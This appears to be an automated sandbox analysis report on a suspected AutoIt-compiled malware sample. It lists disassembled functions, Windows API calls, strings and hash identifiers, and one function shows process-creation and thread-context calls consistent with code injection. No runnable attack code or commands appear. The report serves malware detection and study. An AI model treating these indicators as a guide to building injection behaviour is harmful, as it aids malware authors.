                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                              • String ID:
                              • API String ID: 1559183368-0
                              • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                              • Instruction ID: a8c9d7cdc34dd1b7a68cd2ff06492c9ff89dc08201488cd9622f0f6b5d4b08d5
                              • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                              • Instruction Fuzzy Hash: 8751B571A00B09DBEB248FB9C88466E77A1FF52324F648729F825E6AD0D7709D908B51
                              Function 008869CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1163 8869ca-8869f1 call 884f3d 1166 8be45a-8be46a call 8e97e5 1163->1166 1167 8869f7-886a05 call 884f3d 1163->1167 1171 8be46f-8be471 1166->1171 1167->1166 1172 886a0b-886a11 1167->1172 1173 8be473-8be476 call 884faa 1171->1173 1174 8be490-8be4d8 call 8a0ff6 1171->1174 1176 8be47b-8be48a call 8e4534 1172->1176 1177 886a17-886a39 call 886bec 1172->1177 1173->1176 1183 8be4da-8be4e4 1174->1183 1184 8be4fd 1174->1184 1176->1174 1186 8be4f8-8be4f9 1183->1186 1187 8be4ff-8be512 1184->1187 1188 8be4fb 1186->1188 1189 8be4e6-8be4f5 1186->1189 1190 8be689-8be68c call 8a2f95 1187->1190 1191 8be518 1187->1191 1188->1187 1189->1186 1194 8be691-8be69a call 884faa 1190->1194 1193 8be51f-8be522 call 8875e0 1191->1193 1197 8be527-8be549 call 885f12 call 8e768b 1193->1197 1201 8be69c-8be6ac call 887776 call 885efb 1194->1201 1206 8be54b-8be558 1197->1206 1207 8be55d-8be567 call 8e7675 1197->1207 1214 8be6b1-8be6e1 call 8dfcb1 call 8a106c call 8a2f95 call 884faa 1201->1214 1209 8be650-8be660 call 88766f 1206->1209 1216 8be569-8be57c 1207->1216 1217 8be581-8be58b call 8e765f 1207->1217 1209->1197 1219 8be666-8be670 call 8874bd 1209->1219 1214->1201 1216->1209 1226 8be59f-8be5a9 call 885f8a 1217->1226 1227 8be58d-8be59a 1217->1227 1225 8be675-8be683 1219->1225 1225->1190 1225->1193 1226->1209 1233 8be5af-8be5c7 call 8dfc4d 1226->1233 1227->1209 1238 8be5ea-8be5ed 1233->1238 1239 8be5c9-8be5e8 call 887f41 call 885a64 1233->1239 1241 8be61b-8be61e 1238->1241 1242 8be5ef-8be60a call 887f41 call 886999 call 885a64 1238->1242 1263 8be60b-8be619 call 885f12 1239->1263 1244 8be63e-8be641 call 8e7621 1241->1244 1245 8be620-8be629 call 8dfb6e 1241->1245 1242->1263 1252 8be646-8be64f call 8a106c 1244->1252 1245->1214 1255 8be62f-8be639 call 8a106c 1245->1255 1252->1209 1255->1197 1263->1252
                              APIs
                                • Part of subcall function 00884F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884F6F
                              • _free.LIBCMT ref: 008BE68C
                              • _free.LIBCMT ref: 008BE6D3
                                • Part of subcall function 00886BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886D0D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _free$CurrentDirectoryLibraryLoad
                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                              • API String ID: 2861923089-1757145024
                              • Opcode ID: 881d9a43d2390cf15da7b2553836c40a426ccf8616e5009486c6cdd83781220e
                              • Instruction ID: eaf4352113fdb991e1f9b3970f1e6837b365ab8ff63fc96d10e7704b9acea53b
                              • Opcode Fuzzy Hash: 881d9a43d2390cf15da7b2553836c40a426ccf8616e5009486c6cdd83781220e
                              • Instruction Fuzzy Hash: FD916B71910619AFCF14EFA8CC919EDB7B4FF19314F14446AF816EB2A1EB30A904CB61
                              Function 008835B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008835A1,SwapMouseButtons,00000004,?), ref: 008835D4
                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 008835F5
                              • RegCloseKey.KERNELBASE(00000000,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 00883617
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: Control Panel\Mouse
                              • API String ID: 3677997916-824357125
                              • Opcode ID: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                              • Instruction ID: fe0bb9443d7d22fa169642dea5373805f737febc28797ecf9303159ab993e237
                              • Opcode Fuzzy Hash: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                              • Instruction Fuzzy Hash: 12114871514208BFDB21DFA8DC409AEB7BCFF15B40F008469E805E7210E2719F40A760
                              Function 011012A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01101A5B
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01101AF1
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01101B13
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              • Opcode ID: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                              • Instruction ID: 234ef066d543f87e84663e20495a832995828a50145e6054b185dc42da221bc1
                              • Opcode Fuzzy Hash: 3007ae169ef8b9d8c61beb8ea063371979b6b354134e23f449e077085ff78b4f
                              • Instruction Fuzzy Hash: 70620C30E14658DBEB29DBA4C854BDEB371EF58300F1091A9D10DEB2D0E7B99E81CB59
                              Function 008E97E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00885045: _fseek.LIBCMT ref: 0088505D
                                • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AAE
                                • Part of subcall function 008E99BE: _wcscmp.LIBCMT ref: 008E9AC1
                              • _free.LIBCMT ref: 008E992C
                              • _free.LIBCMT ref: 008E9933
                              • _free.LIBCMT ref: 008E999E
                                • Part of subcall function 008A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008A9C64), ref: 008A2FA9
                                • Part of subcall function 008A2F95: GetLastError.KERNEL32(00000000,?,008A9C64), ref: 008A2FBB
                              • _free.LIBCMT ref: 008E99A6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                              • String ID:
                              • API String ID: 1552873950-0
                              • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                              • Instruction ID: 9ad59ede26655de7c97f30b735369bd6a5aa280fa879a53e7d27d5539949eae2
                              • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                              • Instruction Fuzzy Hash: 89517BB1904658AFDF249F69CC81A9EBBB9FF49310F0000AEF649E7241DB715A80CF59
                              Function 008A493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                              • String ID:
                              • API String ID: 2782032738-0
                              • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                              • Instruction ID: 3858f6d37771f47e3c24ca3dc1aec4d15985f3fb40e152fca00f3eedcc3d25c6
                              • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                              • Instruction Fuzzy Hash: 7441C7716007199BFF188E69C88056F7BA6FFC6360B24913DE855C7E50D7B0AD518744
                              Function 008873E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                              Download Yara Rule
                              APIs
                              • _memset.LIBCMT ref: 008BEE62
                              • GetOpenFileNameW.COMDLG32(?), ref: 008BEEAC
                                • Part of subcall function 008848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008848A1,?,?,008837C0,?), ref: 008848CE
                                • Part of subcall function 008A09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A09F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Name$Path$FileFullLongOpen_memset
                              • String ID: X
                              • API String ID: 3777226403-3081909835
                              • Opcode ID: 9033c5170e9a9fc9d46a98c147dacbe9ef34081a418eee2a687dee5e4fac4b88
                              • Instruction ID: 7332dd597541519d5a4bac5a5305f503a1e1f3471eea996248fa7bc909d4d7ce
                              • Opcode Fuzzy Hash: 9033c5170e9a9fc9d46a98c147dacbe9ef34081a418eee2a687dee5e4fac4b88
                              • Instruction Fuzzy Hash: 3F21C671A142589BDF11EF98CC45BEE7BF8EF49314F104019E408E7241DBF899498F92
                              Function 008E901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __fread_nolock_memmove
                              • String ID: EA06
                              • API String ID: 1988441806-3962188686
                              • Opcode ID: 261686cfba9a3e557e2b8d3bdf651bf030d41a945e79675cd9f858342ece74c7
                              • Instruction ID: a1ee452bda6484017fecd21331b906939b957f0f260f05a6614178e7fe323410
                              • Opcode Fuzzy Hash: 261686cfba9a3e557e2b8d3bdf651bf030d41a945e79675cd9f858342ece74c7
                              • Instruction Fuzzy Hash: CF01F9719046586EDB28C7A8C81AEEE7BF8EB01301F00419AF592D2581E5B9A6048B60
                              Function 008E9B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                              Download Yara Rule
                              APIs
                              • GetTempPathW.KERNEL32(00000104,?), ref: 008E9B82
                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008E9B99
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Temp$FileNamePath
                              • String ID: aut
                              • API String ID: 3285503233-3010740371
                              • Opcode ID: 753ee89bc0254468b335f32d536b7e3f42b77d27bd1e5dcc41e0580b1364ea25
                              • Instruction ID: e3751dc1905be67bbff95b6277e5753323dd367327e9e0fe7c6b64e410affb62
                              • Opcode Fuzzy Hash: 753ee89bc0254468b335f32d536b7e3f42b77d27bd1e5dcc41e0580b1364ea25
                              • Instruction Fuzzy Hash: CDD05E7954430DAFDB209B94EC0EF9A772CEB04704F0042A1BEA4D10A1DEB066989B91
                              Function 008FCDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ff8e2a7f9ebb8a42e47ff84e9c95fc803569eb21018c020bcc4920cbe136fb5c
                              • Instruction ID: bb21f0aa7ddbc1197de4dc11c637bd55d839b15b095523b5b4250e3e34a4ab46
                              • Opcode Fuzzy Hash: ff8e2a7f9ebb8a42e47ff84e9c95fc803569eb21018c020bcc4920cbe136fb5c
                              • Instruction Fuzzy Hash: CCF13871A083059FC714DF28C480A6ABBE5FF88314F14892EFA99DB251DB71E945CF82
                              Function 0088F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008A03D3
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008A03DB
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008A03E6
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008A03F1
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008A03F9
                                • Part of subcall function 008A03A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 008A0401
                                • Part of subcall function 00896259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0088FA90), ref: 008962B4
                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0088FB2D
                              • OleInitialize.OLE32(00000000), ref: 0088FBAA
                              • CloseHandle.KERNEL32(00000000), ref: 008C49F2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                              • String ID:
                              • API String ID: 1986988660-0
                              • Opcode ID: a46cf68abefeeef1bca36cf82bdde327f9ebda2696c69b2930e93af3d821acaf
                              • Instruction ID: 9cbb98b498c106104708a9f75b010f66397e437097c5564373b9da2d795d79fc
                              • Opcode Fuzzy Hash: a46cf68abefeeef1bca36cf82bdde327f9ebda2696c69b2930e93af3d821acaf
                              • Instruction Fuzzy Hash: FD81ABF89293908ECBA4EF39E954E557AF4FB9B718310812AE119C7272EB314444EF13
                              Function 008A594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              • __FF_MSGBANNER.LIBCMT ref: 008A5963
                                • Part of subcall function 008AA3AB: __NMSG_WRITE.LIBCMT ref: 008AA3D2
                                • Part of subcall function 008AA3AB: __NMSG_WRITE.LIBCMT ref: 008AA3DC
                              • __NMSG_WRITE.LIBCMT ref: 008A596A
                                • Part of subcall function 008AA408: GetModuleFileNameW.KERNEL32(00000000,009443BA,00000104,?,00000001,00000000), ref: 008AA49A
                                • Part of subcall function 008AA408: ___crtMessageBoxW.LIBCMT ref: 008AA548
                                • Part of subcall function 008A32DF: ___crtCorExitProcess.LIBCMT ref: 008A32E5
                                • Part of subcall function 008A32DF: ExitProcess.KERNEL32 ref: 008A32EE
                                • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                              • RtlAllocateHeap.NTDLL(01150000,00000000,00000001,00000000,?,?,?,008A1013,?), ref: 008A598F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                              • String ID:
                              • API String ID: 1372826849-0
                              • Opcode ID: 368921db3f88e573e7b07e767b5c79994456a295e5b8dbe5166a021e6ffff279
                              • Instruction ID: 61ef6513c132713cc898732e195cd6fbf40287ce7ea21af0c6894661ea8a241b
                              • Opcode Fuzzy Hash: 368921db3f88e573e7b07e767b5c79994456a295e5b8dbe5166a021e6ffff279
                              • Instruction Fuzzy Hash: BC01C035214A15DEF6212B28BC52B6B7658FF43774F18002AF500EFD81DBB09D819262
                              Function 008E9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008E97D2,?,?,?,?,?,00000004), ref: 008E9B45
                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008E9B5B
                              • CloseHandle.KERNEL32(00000000,?,008E97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008E9B62
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleTime
                              • String ID:
                              • API String ID: 3397143404-0
                              • Opcode ID: 0572c55ffa36f43ea7ea8558e0601c1f44674fb341f0c289a76043b56cc5c0f9
                              • Instruction ID: 828905c44dcf2327938cb69488b922b8a1c28126878aa6bc9343b48466b1f173
                              • Opcode Fuzzy Hash: 0572c55ffa36f43ea7ea8558e0601c1f44674fb341f0c289a76043b56cc5c0f9
                              • Instruction Fuzzy Hash: 90E08632184324BBD7311B54EC09FCA7B18EB05B71F104120FB64A94E087B12611A798
                              Function 008E8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                              • _free.LIBCMT ref: 008E8FA5
                                • Part of subcall function 008A2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,008A9C64), ref: 008A2FA9
                                • Part of subcall function 008A2F95: GetLastError.KERNEL32(00000000,?,008A9C64), ref: 008A2FBB
                              • _free.LIBCMT ref: 008E8FB6
                              • _free.LIBCMT ref: 008E8FC8
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                              • Instruction ID: efe858bc38702fb1aead1598cd7435e54a283fbf26bceabc572b1837d2be3faa
                              • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                              • Instruction Fuzzy Hash: F4E012A1709B419EDA34A57DAD40A9757EEFF4A350718081DB40DDB542DE24E8418128
                              Function 0088AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID: CALL
                              • API String ID: 0-4196123274
                              • Opcode ID: 1654cd38c19167770e118a9f9151667c80d9bf2b5a184448ece097ac1180d12b
                              • Instruction ID: 37b5df10234fa476e0c00be32904595ea23a2fa63b64c771b32bb4243572a173
                              • Opcode Fuzzy Hash: 1654cd38c19167770e118a9f9151667c80d9bf2b5a184448ece097ac1180d12b
                              • Instruction Fuzzy Hash: 4B221674508245DFDB28EF18C494B2AB7E1FF85344F15895EE896CB3A2D731E941CB82
                              Function 00884DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: EA06
                              • API String ID: 4104443479-3962188686
                              • Opcode ID: 44880843e6a4dfeba582533eb12166227c708acedfc6b1e1cc71e25ed28276f1
                              • Instruction ID: 3d000b11c29dbb6fd68ca366a65b71b0c64b2c3b9f6cfdfa9fd06dda32c2dc8b
                              • Opcode Fuzzy Hash: 44880843e6a4dfeba582533eb12166227c708acedfc6b1e1cc71e25ed28276f1
                              • Instruction Fuzzy Hash: 34416E23A046596BDF21BB68C8517BE7FA5FB01314F586065FC82DB282D6219D4483A2
                              Function 0088492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
